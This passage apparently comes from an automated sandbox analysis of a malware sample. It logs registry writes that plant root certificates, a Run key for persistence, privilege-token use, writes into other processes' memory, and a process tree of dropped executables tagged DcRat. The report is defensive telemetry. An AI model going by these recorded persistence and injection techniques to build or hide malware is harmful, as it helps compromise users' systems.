\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 409c415d3f69da01 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe -
Processes:
patch.execsrss.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exepid process 2192 c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe 2192 c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 464 464 -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe1C6C.exehwgsargpid process 2192 c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe 2780 1C6C.exe 2240 hwgsarg -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
288c47bbc1871b439df19ff4df68f076.execsrss.exepowershell.exepowershell.exeexplorer.exesc.exedescription pid process Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeDebugPrivilege 1280 288c47bbc1871b439df19ff4df68f076.exe Token: SeImpersonatePrivilege 1280 288c47bbc1871b439df19ff4df68f076.exe Token: SeShutdownPrivilege 1288 Token: SeSystemEnvironmentPrivilege 1548 csrss.exe Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeLockMemoryPrivilege 1560 explorer.exe Token: SeSecurityPrivilege 1612 sc.exe Token: SeSecurityPrivilege 1612 sc.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
E564.tmppid process 1288 1288 2176 E564.tmp -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 1288 1288 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
BroomSetup.exepid process 1764 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
B396.exeregsvr32.exeC8CD.exeE564.exe43A.exedescription pid process target process PID 1288 wrote to memory of 2132 1288 B396.exe PID 1288 wrote to memory of 2132 1288 B396.exe PID 1288 wrote to memory of 2132 1288 B396.exe PID 1288 wrote to memory of 2132 1288 B396.exe PID 2132 wrote to memory of 2468 2132 B396.exe WerFault.exe PID 2132 wrote to memory of 2468 2132 B396.exe WerFault.exe PID 2132 wrote to memory of 2468 2132 B396.exe WerFault.exe PID 2132 wrote to memory of 2468 2132 B396.exe WerFault.exe PID 1288 wrote to memory of 2440 1288 regsvr32.exe PID 1288 wrote to memory of 2440 1288 regsvr32.exe PID 1288 wrote to memory of 2440 1288 regsvr32.exe PID 1288 wrote to memory of 2440 1288 regsvr32.exe PID 1288 wrote to memory of 2440 1288 regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 2440 wrote to memory of 2496 2440 regsvr32.exe regsvr32.exe PID 1288 wrote to memory of 2912 1288 C8CD.exe PID 1288 wrote to memory of 2912 1288 C8CD.exe PID 1288 wrote to memory of 2912 1288 C8CD.exe PID 1288 wrote to memory of 2912 1288 C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 2912 wrote to memory of 2352 2912 C8CD.exe C8CD.exe PID 1288 wrote to memory of 2460 1288 D607.exe PID 1288 wrote to memory of 2460 1288 D607.exe PID 1288 wrote to memory of 2460 1288 D607.exe PID 1288 wrote to memory of 2460 1288 D607.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1288 wrote to memory of 1636 1288 E564.exe PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1636 wrote to memory of 2176 1636 E564.exe E564.tmp PID 1288 wrote to memory of 2260 1288 43A.exe PID 1288 wrote to memory of 2260 1288 43A.exe PID 1288 wrote to memory of 2260 1288 43A.exe PID 1288 wrote to memory of 2260 1288 43A.exe PID 1288 wrote to memory of 2780 1288 1C6C.exe PID 1288 wrote to memory of 2780 1288 1C6C.exe PID 1288 wrote to memory of 2780 1288 1C6C.exe PID 1288 wrote to memory of 2780 1288 1C6C.exe PID 2260 wrote to memory of 1280 2260 43A.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2260 wrote to memory of 1280 2260 43A.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2260 wrote to memory of 1280 2260 43A.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2260 wrote to memory of 1280 2260 43A.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2260 wrote to memory of 1376 2260 43A.exe InstallSetup4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe"C:\Users\Admin\AppData\Local\Temp\c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe"1⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2192
-
C:\Users\Admin\AppData\Local\Temp\B396.exeC:\Users\Admin\AppData\Local\Temp\B396.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 1242⤵
- Loads dropped DLL
- Program crash
PID:2468
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\C063.dll1⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\C063.dll2⤵
- Loads dropped DLL
PID:2496
-
-
C:\Users\Admin\AppData\Local\Temp\C8CD.exeC:\Users\Admin\AppData\Local\Temp\C8CD.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\C8CD.exeC:\Users\Admin\AppData\Local\Temp\C8CD.exe2⤵
- DcRat
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2352
-
-
